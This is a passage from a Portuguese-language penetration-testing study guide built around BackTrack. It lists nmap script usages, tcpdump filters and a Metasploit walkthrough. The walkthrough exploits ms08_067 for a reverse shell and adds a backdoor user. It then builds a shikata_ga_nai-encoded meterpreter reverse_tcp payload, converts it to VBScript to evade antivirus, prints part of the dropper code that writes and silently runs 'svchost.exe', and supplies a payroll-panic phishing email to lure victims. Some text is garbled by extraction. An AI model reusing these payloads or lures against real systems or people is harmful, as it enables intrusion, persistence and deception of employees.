@usage nmap --script smb-os-discovery.nse -p445 127.0.0.1 sudo nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139 127.0.0.1 description = Attempts to print text on a shared printer by calling Print Spooler Service RPC functions. In order to use the script, at least one printer needs to be shared over SMB. If no printer is specified, script tries to enumerate existing ones by calling LANMAN API which might not be always available. LANMAN is available by default on Windows XP, but not on Vista or Windows 7

@usage nmap -p 445 --script=smb-print-text --scriptargs="text=0wn3d"

description = Implements remote process execution similar to the Sysinternals' psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool a rangeofofcomputers. system, or even installing a backdoor on a on collection


3 23


@usage nmap

sudo

--script smb-psexec.nse --scriptargs=smbuser=,smbpass=[,co nfig=] -p445 nmap -sU -sS --script smb-psexec.nse --scriptargs=smbuser=,smbpass=[,co nfig=] -p U:137,T:139

description = Returns information about the SMB security level determined by SMB.

@usage nmap --script smb-security-mode.nse -p445 127.0.0.1 sudo nmap -sU -sS --script smb-security-mode.nse -p U:137,T:139 127.0.0.1

description = Attempts to grab the server's statistics over SMB and MSRPC, which uses TCP ports 445 or 139. An administrator account is required to pull these statistics on most versions of Windows, and Vista and above require UAC to be turned down.

@usage nmap --script smb-server-stats.nse -p445


3 24


sudo nmap -sU -sS --script smb-server-stats.nse -p U:137,T:139

description = Pulls back information about the remote system from the registry. Getting all of the information requires an administrative account, although a user account will still get a lot of it. Guest probably won't get any, nor will anonymous.

@usage nmap --script smb-system-info.nse -p445 sudo nmap -sU -sS --script smb-system-info.nse -p U:137,T:139

description = Checks whether or not a server is running the SMBv2 protocol.

@usage nmap --script smbv2-enabled.nse -p445 sudo nmap -sU -sS --script smbv2-enabled.nse -p U:137,T:139

description = Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.


3 25


@usage nmap -p 445 --script=smb-vuln-ms10-054 -script-args unsafe

description = Tests whether target machines are vulnerable to ms10061 Printer Spooler impersonation vulnerability. References: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE2010-2729 - http://technet.microsoft.com/enus/security/bulletin/MS10-061 - http://blogs.technet.com/b/srd/archive/2010/09/14/ms10061-printer-spooler-vulnerability.aspx

@usage nmap -p 445 --script=smb-vuln-ms10-061

description = Performs brute force password auditing against SMTP servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM authentication.

@usage nmap -p 25 --script smtp-brute

description = Attempts to use EHLO and HELP to gather the Extended commands supported by anSM TP server.


3 26


@usage nmap

--script smtp-commands.nse [--script-args smtpcommands.domain=] -pT:25,465,587

description = Attempts to relay mail by issuing a predefined combination of SMTP commands. The goal of this script is to tell if a SMTP server is vulnerable to mail relaying.

@usage nmap --script smtp-open-relay.nse [--script-args smtp-openrelay.domain=,smtp-openrelay.ip=
,...] -p 25,465,587

description = Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345). Reference: * http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4344 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4345

@usage nmap

--script=smtp-vuln-cve2010-4344 --script-args="smtpvuln-cve2010-4344.exploit" -pT:25,465,587


3 27


nmap

--script=smtp-vuln-cve2010-4344 --scriptargs="exploit.cmd='uname -a'" -pT:25,465,587

description = Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution. Reference: * http://www.postfix.org/CVE-2011-1720.html

@usage nmap

--script=smtp-vuln-cve2011-1720 --scriptargs='smtp.domain=' -pT:25,465,587

description = Checks for a format string vulnerability in the Exim SMTP server(version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support(CVE-20111764). Reference: * http://bugs.exim.org/show_bug.cgi?id=1106 * http://thread.gmane.org/gmane.mail.exim.devel/4946 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-1764 * http://en.wikipedia.org/wiki/DomainKeys_Identified_Mail


3 28


@usage nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587

description = Attempts to find an SNMP community string by brute force guessing.

@usage nmap -sU --script snmp-brute [--script-args snmpbrute.communitiesdb= @args snmp-brute.communitiesdb The filename of a list of community strings to try.

description = Attempts to downloads Cisco router IOS configuration files using SNMP RW (v1) and display or save them.

@usage nmap -sU -p 161 --script snmp-ios-config --script-args snmpcommunity=

description = Attempts to extract system information from an SNMP version 1 service.

@usage nmap -sU -p 161 --script snmp-sysdescr


3 29


description = Determines the supported authentication mechanisms of a remote SOCKS proxy server. Starting with SOCKS version 5 socks servers may support authentication.

@usage nmap -p 1080 --script socks-auth-info

description = Performs brute force password auditing against SOCKS 5 proxy servers.

@usage nmap --script socks-brute -p 1080

description= Checks if an open socks proxy is running on the target.

@usage nmap --script=socks-open-proxy \ --script-args proxy.url=,proxy.pattern=

description = Reports the number of algorithms (for encryption, compression, etc.) that the target SSH2 server offers. If verbosity is set, the offered algorithms are each listed by type.


3 30


@usage nmap --script ssh2-enum-algos target

description = Shows SSH hostkeys. Shows the target SSH server's key fingerprint and (with high enough verbosity level) the public key itself. It records the discovered host keys in nmap.registry for use by other scripts. Output can be controlled with the ssh_hostkey script argument.

@usage nmap host --script SSH-hostkey --script-args ssh_hostkey=full nmap host --script SSH-hostkey --script-args ssh_hostkey=all nmap host --script SSH-hostkey --script-args ssh_hostkey='visual bubble

description = Retrieves a target host's time and date from its TLS ServerHello response.

@usage nmap --script=ssl-date


3 31


description = This script repeatedly initiates SSL/TLS connections, each time trying a new cipher or compressor while recording whether a host accepts or rejects it. The end result is a list of all the ciphers and compressors that a server accepts.

@usage nmap --script ssl-enum-ciphers -p 443

description = Queries Google's Certificate Catalog for the SSL certificates retrieved from target hosts.

@usage nmap -p 443 --script ssl-cert,ssl-google-cert-catalog

description = Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.

@usage nmap --script ssl-known-key -p 443

description = Retrieves the external IP address of a NAT:ed host using the STUN protocol.


3 32


@usage nmap -sV -PN -sU -p 3478 --script stun-info

description = Detects whether a host is infected with the Stuxnet worm (http://en.wikipedia.org/wiki/Stuxnet). An executable version of the Stuxnet infection will be downloaded if a format for the filename is given on the command line.

@usage nmap --script stuxnet-detect -p 445

description = Performs brute force password auditing against Subversion source code control servers.

@usage nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690

description = Produces a list of IP prefixes for a given routing AS number (ASN). http://www.shadowserver.org/wiki/pmwiki.php/Services/IP-BGP

@usage nmap --script targets-asn --script-args targets-asn.asn=32


3 33


description = Sends an ICMPv6 echo request packet to the all-nodes link-local multicast address (ff02::1) to discover responsive hosts on a LAN without needing to individually ping each IPv6 address.

@usage ./nmap -6 --script=targets-ipv6-multicast-echo.nse --script-args 'newtargets,interface=eth0' -sL

description = Sends an ICMPv6 packet with an invalid extension header to the all-nodes link-local multicast address (ff02::1) to discover (some) available hosts on the LAN. This works because some hosts will respond to this probe with an ICMPv6 Parameter Problem packet.

@usage ./nmap -6 --script=targets-ipv6-multicast-invalid-dst.nse --scriptargs 'newtargets,interface=eth0' -sP

description = Attempts to discover available IPv6 hosts on the LAN by sending an MLD (multicast listener discovery) query to the link-local multicast address (ff02::1) and listening for any responses. The query's maximum response delay set to 0 to provoke hosts to respond immediately rather than waiting for other responses from their multicast group.


3 34


@usage nmap -6 --script=targets-ipv6-multicast-mld.nse --script-args 'newtargets,interface=eth0' -sP

description = Performs IPv6 host discovery by triggering stateless address auto-configuration (SLAAC). http://dev.metasploit.com/redmine/projects/framework/repository/cha nges/modules/auxiliary/scanner/discovery/ipv6_neighbor _router_advertisement.rb

@usage ./nmap

-6 --script=slaac_host_discovery.nse 'newtargets,interface=eth0' -sP

--script-args

description = Sniffs the local network for a configurable amount of time (10 seconds by default) and prints discovered addresses. If the newtargets script argument is set, discovered addresses are added to the scan queue.

@usage nmap

-sL

--script=targets-sniffer

--script-

args=newtargets,targets-sniffer.timeout=5s,targetssniffer.iface=eth0 -- @args targets-sniffer.timeout The amount of time to listen for packets. Default 10s.


3 35


-- @args targets-sniffer.iface The interface to use for sniffing. -- @args newtargets If true, add discovered targets to the scan queue.

description = Inserts traceroute hops into the Nmap scanning queue. It only functions if Nmap's --traceroute option is used and the newtargets script argument is given.

@usage nmap --script targets-traceroute --script-args newtargets -traceroute target

description = Determines whether the encryption option is supported on a remote telnet server. Some systems (including FreeBSD and the krb5 telnetd available in many Linux distributions) implement this option incorrectly, leading to a remote root vulnerability. This script currently only tests whether encryption is supported, not for that particular vulnerability.

@usage nmap -p 23 --script telnet-encryption

description = Enumerates TFTP (trivial file transfer protocol) filenames by testing for a list of common ones.


3 36


@usage nmap -sU -p 69 --script tftp-enum.nse --script-args="tftpenum.filelist=customlist.txt"

description = Enumerates a TLS server's supported protocols by using the next protocol negotiation extension.

@usage nmap --script=tls-nextprotoneg

description = Lists the geographic locations of each hop in a traceroute and optionally saves the results to a KML file, plottable on Google earth and maps.

@usage nmap --traceroute --script traceroute-geolocation

description = Compares the detected service on a port against the expected service for that port number (e.g. ssh on 22, http on 80) and reports deviations. The script requires that a version scan has been run in order to be able to discover what service is actually running on each port.

@usage nmap --script unusual-port


3 37


description= Sniffs an interface for HTTP traffic and dumps any URLs, and their srcinating IP address. Script output differs from other script as URLs are written to stdout directly. There is also an option to log the results to file.

@usage nmap --script url-snarf -e

description = Extracts information, including file paths, version and database names from a Versant object database.

@usage nmap -p 5019 --script versant-info

description = Performs brute force password auditing against the VMWare Authentication Daemon (vmware-authd).

@usage nmap -p 902 --script vmauthd-brute

description = Performs brute force password auditing against VNC servers.

@usage nmap --script vnc-brute -p 5900


3 38


description = Retrieves cluster and store information from the Voldemort distributed key-value store using the Voldemort Native Protocol.

@usage nmap -p 6666 --script voldemort-info

description = Retrieves some basic information, including protocol version from a Vuze filesharing node.

@usage nmap -sU -p --script vuze-dht-info -sV

description = Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.

@usage nmap -sU -p 17185 --script wdb-version

description = Queries the WHOIS services of Regional Internet Registries (RIR) and attempts to retrieve information about the IP Address Assignment which contains the Target IP Address.


3 39


@usage # Basic usage: nmap target --script whois

description = Retrieves and displays information from devices supporting the Web Services Dynamic Discovery (WSDiscovery) protocol. It also attempts to locate any published Windows Communication Framework (WCF) web services (.NET 4.0 or later).

@usage sudo ./nmap --script broadcast-wsdd-discover

description = Requests an XDMCP (X display manager control protocol) session and lists supported authentication and authorization mechanisms.

@usage nmap -sU -p 177 --script xdmcp-discover

description = Performs brute force password auditing against XMPP (Jabber) instant messaging servers.

@usage nmap -p 5222 --script xmpp-brute


3 40


TCPDump O tcpdump é uma ferramenta muito utilizada para monitorar os pacotes trafegados numa rede de computadores. Ela mostra os cabeçalhos pacotesde que passam pela desejada. interface de rede especificada, obedecendodos as opções configurações Vejamos abaixo algumas opções de utilização dessa maravilhosa ferramenta.

Opções #tcpdump -i eth0


3 41


Com o comando: # tcpdump -nn -ni eth0 host 192.168.0.100 podese fazer filtro de captura por host. Mias se desejarmos apenas os pacotes destinados ao host 192.168.0.100 bastaria incluir o “src”: Exemplo: # tcpdump -nn -ni

eth0 src host 192.168.0.100 Para capturar de forma inversa ao exposto anteriormente ou seja, capturar pacotes destinado a o host 192.168.0.100 o comando seria: #

tcpdump -nn -ni eth0 dst host 192.168.0.100 Pode-se também ser mais específicos (usando, dst port e src port) podendo especificar portas por exemplo. Para capturar pacotes srcinados no host 192.168.0.100 com destino à porta 80 de qualquer outro host o comando seria: # tcpdump -nn -ni eth0 src host

192.168.0.100 and dst port 80


3 42


No exemplo anterior utiliza-se dos operadores lógicos (and, or). Onde o “and” faz com que o TCPDump só capture os pacotes onde ambas

as condições forem verdadeiras (o pacote deve ter saído de 192.168.0.100 e ter como destino a porta 80). Utilizando- se o “or”, qualquer pacote onde pelo menos uma das duas condições forem verdadeiras será considerado como verdadeiro e os pacotes serão capturados. Ex: # tcpdump -nn -ni eth0 src host 192.168.0.100 or dst port 80 Se desejar especificar um host o efeito será o mesmo. Por exemplo, o comando a seguir vai capturar qualquer pacote que envolva os hosts 192.168.0.100 ou 192.168.0.110 # tcpdump -nn -ni eth0 host

192.168.0.100 or host 192.168.1.110 Pode-se também utilizar nomes de domínio para capturar pacotes # tcpdump -i eth0 dst host www.clubedohacker.com.br Também é possível negar um host, excluindo apenas os hosts que você especificar da captura. # tcpdump -nn -ni eth0 not host

192.168.0.110 - Nesse caso o tcpdump não irá capturar nenhum pacote que se relacione com o host 192.168.0.110, mas irá capturar todo o resto já que não foi adicionado nenhum outro filtro.


3 43


Utiliza-se a flag -w para gravar o resultado em um determinado arquivo: # tcpdump -nn -ni eth0 not host 192.168.0.110 -w

/home/arquivo.pcap Se desejar visualizar o conteúdo dos pacotes, utiliza-se a opção -r do TCPDump: # tcpdump -r /home/arquivo.pcap

Metasploit Framework

Muitos analistas utilizam ferramentas das mais diversas e o backtrack "tema principal dessa obra oferece mais de 300 opções das quais o Metasploit tem destaque". O Metasploit é perfeito para o que chamamos de prova de conceito, ou seja, a exploração de vulnerabilidades quando você tem quem invadir pra documentar e provar na pratica que tal sistema está vulnerável.


3 44


O Metasploit fornece informações e ferramentas úteis para analistas de vulnerabilidades , também fornece o maior conjunto de exploits já prontos para prova de conceito. Os pesquisadores de segurança, e os desenvolvedores o utilizam exaustivamente. O Metasploit também ajuda e muito no dia a dia de quem trabalha com IDS. O Metasploit é um projeto open source e está inserido no Backtrack como já mencionei acima. Esse framework é realmente algo maravilhoso com grande poder de crescimento. Informações completas podem ser obtidas no site oficial http://www.metasploit.com/ Vale ressaltar que não se trata de uma obra sobre metasploit, portanto, passaremos alguns conceitos e como utilizá-lo apenas com o objetivo de fazer nossas provas de conceito em determinadas técnicas de ataque.

Comandos úteis no metasploit Vamos direto ao assunto: Para se utilizar o metasploit é necessário conhecer alguns comandos básicos de manipulação de exploit, payloads etc. vamos as eles:


3 45


Comando show: Há uma série de comandos “show” que você pode usar, mas os que você irá usar mais freqüentemente são “show options show auxiliary”, “show exploits” e “show payloads”.

Pode ocorrer de você esta dentro de um modulo do metasploit e ter duvidas de qual sistema operacional seria vulnerável a ele, nesses casos você pode recorrer ao comando “show targets” de dentro do

módulo que ele vai te informar quais sistemas alvo seriam suportados. Você pode utilizar o comando show se deseja fazer mais alguns ajustes em determinado modulo de exploit, pra isso basta executar o comando “show advanced”.

Comando use: Assim que você souber qual exploit vai usar, utilize o comando use para selecionar o exploit de dentro da shell do metasploit. Exemplo: use exploit/xx/xx/xxxxxxxxx

Comando info: O comando “info” irá fornecer informações detalhadas sobre um determinado módulo especial, incluindo todas as opções, os alvos, e outras informações. Também deve ser utilizado de dentro do modulo.

Comando connect: Ao digitar o comando "connect" com um endereço IP e o número da porta, você pode se conectar a um servidor remoto de dentro da console do metsploit da mesma forma que você faria se estivesse utilizando o netcat ou o telnet.


3 46


Comando search: O comando search é utilizado para busca geral dentro de módulos e fora dele.

Comando set: O comando “set” é usado para configurar as opções e configurações do módulo que você estiver trabalhando atualmente. Seja um exploit, payload etc.

Comando check: Alguns exploits, mas só alguns suportam esse comando, ele vai verificar se o alvo é vulnerável a um exploit em particular. Isso é interessante pois ele faz o mesmo papel que fazem os scripts do nmap.

Comando back: Sempre que você terminar uma tarefa e desejar para aquele modulo retrocedendo ou tenha selecionado por enganos um determinado módulo, você pode digitar o comando “back” e mover-se para fora do contexto atual. Para ter acesso ao metasploit é bem simples, aqui estou utilizando backtrak, mas pra quem utiliza Windows é mais simples, basta instalar o metasploit que você vai baixando site oficial e clicar duas vezes no ícone correspondente. Em meu site www.clubedohacker.com.br eu tenho uma seção onde tiro duvidas sobre essa obra.


3 47


Praticando com o Metasploit.

Entrando no diretório do framework iremos encontrar diversas consoles e outras opções, algumas iremos trabalhar aqui e vamos explicando passo a passo. Nesse momento iremos utilizar a console msfconsole que é totalmente em Shell, sem nenhum ambiente gráfico, assim podemos explorar melhor os recursos sem o inconveniente do mouse ou telas adicionais. Nosso comando agora é ./msfconsole para carregar nossa Shell.


3 48


Temos aqui a nossa primeira Shell metasploit, é a partir daqui que faremos nossas provas de conceito. Nessa tela podemos observar a quantidade de exploits, de payloads, auxiliares e outros. Mas o que significa tudo isso?

Exploits: Define que tipo de ataques você vai usar para explorar determinada vulnerabilidade. Os exploits são configurados através de diversas opções que devem ser definidas antes de ser utilizado. -Alguns exploits fazem uso de cargas (payloads) e aqueles que não faz uso de cargas são definidos como módulos auxiliares. Payloads, Encoders, NOPS : Payloads são os códigos que você vai executar remotamente no sistema de destino.


3 49


Os Payloads são executados através de um codificador para garantir que não ocorram erros de transmissão. Os nops mantém o tamanhos das cargas consistente. Na prática funciona assim: Você configura um exploit e injeta nele um payload. O exploit irá explorar a vulnerabilidade do sistema remoto e vai levar consigo uma carga ou seja, o payload. A partir daí o payload assume a tarefa de execução dos comandos arbitrários na maquina da vitima.

Auxiliary: O Metasploit traz consigo centenas de módulos auxiliares tais como, Scanners, Snifferse vários outros módulos, inclusive para ataques de negação de serviço. Esses módulos são chamados de módulos auxiliares e são muito úteis em seu dia a dia de analista de vulnerabilidades. Suporte a comandos externos: Execução de comandos externos no msfconsole é possível, por exemplo você pode digitar o comando ping e ou outros sem precisar sair da console. Invadindo com exploit Após o entendimento básico sobre o framework, podemos realizar nossas tarefas, configurar nossos exploits e fazer as provas de conceito com base nas vulnerabilidades encontradas. Pra começar vamos explora vulnerabilidade encontrada o nmap

ms08_067. Uma vulnerabilidade muito antiga do sistema Microsoft, mais o que é mais importante aqui é ensinar como configurar um exploit, um payload e explorar uma vulnerabilidade.


3 50


Nesse exemplo foi digitado no metasploit o comando use exploit/Windows/smb/ms08_67_netatapi e com um enter foi selecionado o modulo. Depois foi digitado o comando show options e foi mostrado as opções de variáveis que precisam ser setada dentro do modulo.


3 51



3 52


Aqui utilizamos o comando set RHOST 192.168.0.14 pra setar a variável host remoto, ou maquina alvo.

Essa tela confirma que nosso comendo foi aceito. Agora devemos injetar a carga, (payload). Utilizaremos o mesmo comando set, só que agora apontando para um payload de conexão reversa.


3 53


Nosso comando foi aceito também. Agora vamos configurar o payload.


3 54


Através do comando show options descobrimos que agora precisamos configurar a variável LHOST que nada mais é que minha maquina local. A maquina que recebera a conexão da vitima. Iremos utilizar o


3 55


comando set LHOST 192.168.0.12 que é o meu IP.


3 56


Todos os comandos foram aceitos e o modulo esta configura, pronto para uso. O comando final agora é exploit e é o que faremos agora.

Com o comando exploit iremos disparar o ataque.


3 57


O ataque foi executado com sucesso e ganhamos uma Shell meterpreter, agora é só migrar pra dentro do Windows na máquina da


3 58


vitima. Para isso basta digitar o comando Shell.

Após o comando Shell e teclando enter, nós temos um prompt cmd.exe do Windows. A partir daqui podemos executar qualquer comando, inclusive instalar programas, como vírus, backdoors e outros.


3 59


Para provar isso vamos migrar pra raiz do sistema com o comando cd\


3 60


Pronto! Usando o comando net users visualizamos as contas dos usuários na maquina da vitima.


3 61


Podemos criar um novo usuário, assim quando precisar retornar, já teremos um usuário pra logar.


3 62


Com o comando net user sifu 123 ADD eu criei um novo usuário chamado sifu com a senha 123 na máquina da vitima.

Pronto! Aqui está o usuário criado e pronto para uso.

Ataque do lado do cliente! Com o Metasploit você pode também disparar ataques do lado do cliente utilizando engenharia social. 

Vamos fazer agora uma demonstração desse tipo de ataque.

Iremos criar um payload usando o codificador shikata_ga_nai polimórfico com metasploit. 

Depois de criado será gerado um executável para conectar de

volta em sua máquina através de conexão reversa pela porta 8080.


3 63

ADONEL BEZERRA GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES ............................................................................................................... 

Após a criação do executável iremos convertê-lo num vbscript

para que você possa explorar através do word. Após a conclusão de todo esse processo iremos fazer uma demonstração de invasão com tudo funcionando. Considerando que alguém na empresa tenha aberto o arquivo. Lembre-se: Um analista de vulnerabilidades nunca desiste e a técnica que será apresentada aqui é infalível se bem executada, já que não esta relacionada a nenhum sistema operacional, mas sim a aplicação e o ser humano usuário do sistema. Nós chamamos de ataque do lado do cliente porque esse tipo de ataque usa as pessoas como alvo principal. Imagine você esta na empresa trabalhando normalmente e recebe um e-mail da contabilidade com o seguinte texto. Pr ezados colaboradores, nosso sistema de contr ole de folha de pagamento f oi infectado com um vírus que ainda não sabemos qual. Jáchamamos o suporte de informáti ca pra ver se consegue resolver, no entan to hoje é dia 26 e precisamos fechar a folha de pagamento até o dia 30 sob pena de não ser possí vel a liberação dos salários no 5.o dia úti l. Par a que possamos nos antecipado, resolvemos recadastr ar todos os funcionários, por tanto, vocêdeve impr imi r esse documento e


3 64


entr egar no setor responsável pela folha de pagamento par a que possamos providenci ar o recadastr o. Atenciosamente, Ax7d45eh da silva

Essa é uma técnica antiga e é chamada de engenharia social. Nesse caso utiliza-se o pânico, o medo das pessoas não conseguir receber seus salários na data certa fará com que muitas pessoas clique num arquivo pdf ou doc ou qualquer outro que você enviar e quando o primeiro chegar no setor com o papel impresso ira descobrir que não houve nenhum problema e tudo esta na mais perfeita ordem. É claro que isso em algumas empresas vai gerar muitos comentários e a área de informática vai agir. A questão é quando isso acontecer você já entrou e saiu sem que ninguém percebesse. Nenhum antivírus ou sistema de proteção. Vamos fazer uma demonstração agora de como se faz analise de vulnerabilidades usando o lado mais fraco. O ser humano usuário da estação de trabalho.


3 65


Gerando um VBScript e injetando a carga "payload" Para essa tarefa você pode usar o metasploit para infectar um documento do Word do Excel ou um arquivo pdf como um livro por exemplo com payloads. Você também pode usar seus próprio payloads customizados se desejar, pois nesse caso não é obrigatório que seja um payload Metasploit. Este método é útil quando não se consegue sucesso com os ataque tradicionais pois se trata de um ataque do lado do cliente. É fundamental também quando se quer burlar um antivírus ou outro sistema de proteção. Primeiro devemos criar nosso VBScript e configurar um ouvinte no metasploit. ./msfpayload root@bt:/pentest/exploits/framework3# windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8080 ENCODING=shikata_ga_nai x >payload.exe


3 66


Com esse comando iremos criar um payload com o nome payload.exe e injetar a carga reverse_tcp nele. Isso fará com que qualquer máquina que venha abrir esse arquivo procure por você através de uma conexão reversa. Isso significa que você não ira invadir a maquina remota, pelo contrário. Ela vai se conectar com você. Seu trabalho será apenas deixar sua maquina escutando na mesma porta 8080. A escolha dessa porta se dar por motivos óbvios. Normalmente ela esta sendo filtrada pelos firewalls quando se refere a entrada de pacotes, mas não para a saída.


3 67


O comando foi aceito e o payload foi criado.

Uma observação importante: Sabemos que com essa extensão .exe nenhum antivírus, mesmo o mais fraco vai deixar passar esse arquivo. Então teremos que trabalhar ele e testar. Vamos move-lo para o nosso diretório tools que fica dentro do diretório framework. root@bt4:#mv payload.exe /pentest/exploits/framework/tools/

root@bt: #cd /pentest/exploit/framework/ tools/ Entramos no diretório tools e confirmamos que foi movido.


3 68


O próximo passo é converte-lo em um vbscript root@bt:/pentest/exploit/framework/tools# ruby exe2vbs.rb payload.exe payload.vbs Com o comando acima vamos converter nosso payload num inofensivo vbscript e testar com alguns antivírus.


3 69


Como podemos ver pela imagem, a conversão foi feita com sucesso. root@bt:/pentest/exploit/framework/tools#cd .. com o comando cd .. iremos voltar um diretório.

Vamos recapitular: Nós criamos o nosso payload usando o codificador shikata_ga_nai polimórfico que se transformou em um executável, para se conectar através de uma conexão reversa em nossa maquina com o IP 192.168.0.12 pela porta 8080. Em seguida, convertemos para um VBScript usando o script exe2vbs.rb” na seção

de ferramentas "tools". Agora já está completo, veja o resultado do script abaixo. Function HPrYzuXz() EuQGd=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0 )&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Ch r(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Ch r(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr (0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0 )&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) &Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&


3 70


Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)& Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&C hr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Ch r(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)& Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(3 2)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Ch r(32)&Chr(98)&Chr( EuQGd=EuQGd&Chr(98)&Chr(0) Dim eMmJpwSfyQrrKoA Set eMmJpwSfyQrrKoA = CreateObject("Scripting.FileSystemObject") Dim pgNtYwASMJUn Dim IdcqlfVALIUUrTr Dim mzTrhWSeUcj Dim vnoRFmdcaOs Set IdcqlfVALIUUrTr = eMmJpwSfyQrrKoA.GetSpecialFolder(2) vnoRFmdcaOs = IdcqlfVALIUUrTr & "\" & eMmJpwSfyQrrKoA.GetTempName() eMmJpwSfyQrrKoA.CreateFolder(vnoRFmdcaOs) mzTrhWSeUcj = vnoRFmdcaOs & "\" & "svchost.exe" Set pgNtYwASMJUn = eMmJpwSfyQrrKoA.CreateTextFile(mzTrhWSeUcj,2,0) pgNtYwASMJUn.Write EuQGd pgNtYwASMJUn.Close Dim DASaEXZNGN Set DASaEXZNGN = CreateObject("Wscript.Shell") DASaEXZNGN.run mzTrhWSeUcj, 0, true eMmJpwSfyQrrKoA.DeleteFile(mzTrhWSeUcj) eMmJpwSfyQrrKoA.DeleteFolder(vnoRFmdcaOs) End Function HPrYzuXz


3 71


Na verdade o código gerado é enorme, com varias paginas. Eu recortei aqui e deixei apenas o inicio e final do código por questão de espaço, mas você pode gerar o seu e verá o tamanho que vai ficar. Agora você deve enviar para a máquina vitima e aguardar a conexão de acordo com o planejado, mais pra isso sua máquina deve está escutando conexões na mesma porta "8080" Para que isso aconteça você terá que configurar sua máquina nesse sentido. root@bt:/pentest/exploit/framework#./msfcli | grep multi/handler Com o comando acima você irá habilitar o e depois poderá manipular portas.

O primeiro comando foi aceito e a maquina está apta a manipular a porta escuta.com o payload criado e o proximo passo é colocar a máquina em root@bt:/pentest/exploit/framework#./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=192.168.0.12 E.


3 72


Nessa tela pode-se ver o comando em execução e a máquina escutando na porta solicitada "8080".

Todos os comando foram aceitos e a máquina está escutando as conexões de entrada na porta 8080. Ai é só aguardar o que alguma vitima clique no arquivo.


3 73


Aqui o primeiro sistema aparecendo. É uma maquina minha7.instalada em meu laboratório testes que esta utilizando o Windows Ultima versão e com todos osdepatches instalados conforme pode ser comprovado nas próximas telas.


3 74


Aqui já com acesso a maquina e com os mesmos poderes do usuário logado, dentro do mesmo diretório onde se alojou o script.

Dependendo do tipo de comando que você vai executando você pode determinar o nível da conta do usuário e consequentemente suas permissões dentro do sistema.


3 75


pronto. aqui você já está na raiz do sistema remoto.

Aqui nessa tela pode-se ver a lista de diretórios existentes na maquina remota. Existem mais de uma centena de formas de se disparar um ataque a determinado alvo com Metasploit, isso depende principalmente da motivação e dos resultados que se espera. Só no metasploit são mais de


3 76


900 exploits e mais de 250 payloads, alem do mais você tem como criar seus próprios payload.

Armitage O Backtrack traz em seu conjunto uma ferramenta excelente para quem trabalha com o metasploit, o nome dessa nova opção é Armitage. Com uma interface gráfica amigável ela tem o objetivo de facilitar a vida de quem utiliza Metasploit e não deseja permanecer em linha de comando. Até mesmo quem não tem muito conhecimento em analise de vulnerabilidades conseguirá bons resultados.


3 77


O Armitage esta disponível para downloads no repositório do Backtrack, e pode ser baixado e instalado através do comando "aptitude ou apt-get install armitage" no backtrack 5 já vem instalado.

De dentro do framework basta digitar #armitage e mandar conectar


3 78


Ele levará um tempinho para carregar, da mesma forma que na linha de comandos quando você digita ./msfconsole


3 79


Para se fazer uma varredura é super simples, basta escolher a ferramenta, selecionar a ação que deseja e mandar executar "Launch" e pronto, é só aguardar um alguns instantes para que a varredura se complete.

As configurações de RHOSTS, RHOST, LHOST Payload etc. seguem o mesmo procedimento da linha de comandos, a diferença é a facilidade de se utilizar uma "GUI" e poder fazer quase tudo com alguns cliques do mouse. Como pode-se observar, o Armitage proporciona uma excelente interface para o Metasploit que pode vir a economizar muito tempo na maioria dos casos.


3 80


httsquash Essa é uma ferramenta de scanner HTTP e HTTPS muito eficiente.

Opções disponiveis -r Intervalo de endereços IP ou nome DNS de destino. Exemplos: 208.67.1.1-254, 2001 :: 1428:57 ab-6344, google.com) -p Porta (padrão 80) Opções extras: -t Tempo em segundos (o padrão é) -b Apresentação das respostas (dados html)


3 81


-S Use HTTPS ao invés de HTTP -T Personalização de consulta (o padrão GET) -U Personalização de consulta URL (o padrão é /) -H Definição do cabeçalho para a solicitação (pode ser usado várias vezes) exemplos: Keep-Alive: 300, User-Agent: httsquash existem também as opções adicionais para scripts.

Aqui um exemplo de como para utilizar o httsquash. #./httsquash - www.adonelbezerra.com.br

